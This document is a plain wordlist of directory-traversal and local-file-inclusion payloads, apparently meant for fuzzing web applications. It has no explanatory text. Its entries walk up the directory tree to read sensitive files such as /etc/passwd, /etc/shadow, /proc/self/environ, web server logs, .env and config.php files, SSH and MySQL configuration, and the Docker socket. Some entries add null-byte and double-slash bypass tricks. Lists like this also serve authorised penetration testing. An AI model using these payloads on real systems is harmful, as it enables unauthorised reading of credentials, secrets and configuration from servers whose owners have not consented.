../../../../etc/passwd
../../../../etc/hosts
../../../../proc/self/environ
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../proc/version
../../../../proc/cpuinfo
../../../../proc/meminfo
../../../../usr/local/etc/php.ini
../../../../boot.ini
../../../windows/win.ini
../../../windows/system32/drivers/etc/hosts
../..//..//..//..//etc/passwd
../..//..//..//..//var/log/syslog
../..//..//..//..//var/log/messages
../../../../etc/shadow
../../../../var/www/html/index.php
../../../../var/www/html/config.php
../../../../var/www/html/.env
../../../../var/www/html/.htaccess
../../../../var/www/html/uploads/file.txt
../../../../usr/bin/env
../../../../etc/ssh/sshd_config
../../../../etc/mysql/my.cnf
../../../etc/passwd%00
../../../etc/passwd%20
../index.php
../config.php
../uploads/../../../../etc/passwd
../uploads/../../../../etc/shadow
../../../../var/log/httpd/access_log
../../../../var/log/httpd/error_log
../../../../var/run/docker.sock
../../../../var/lib/docker/containers/*/*.json
../../../../var/www/html/.htaccess
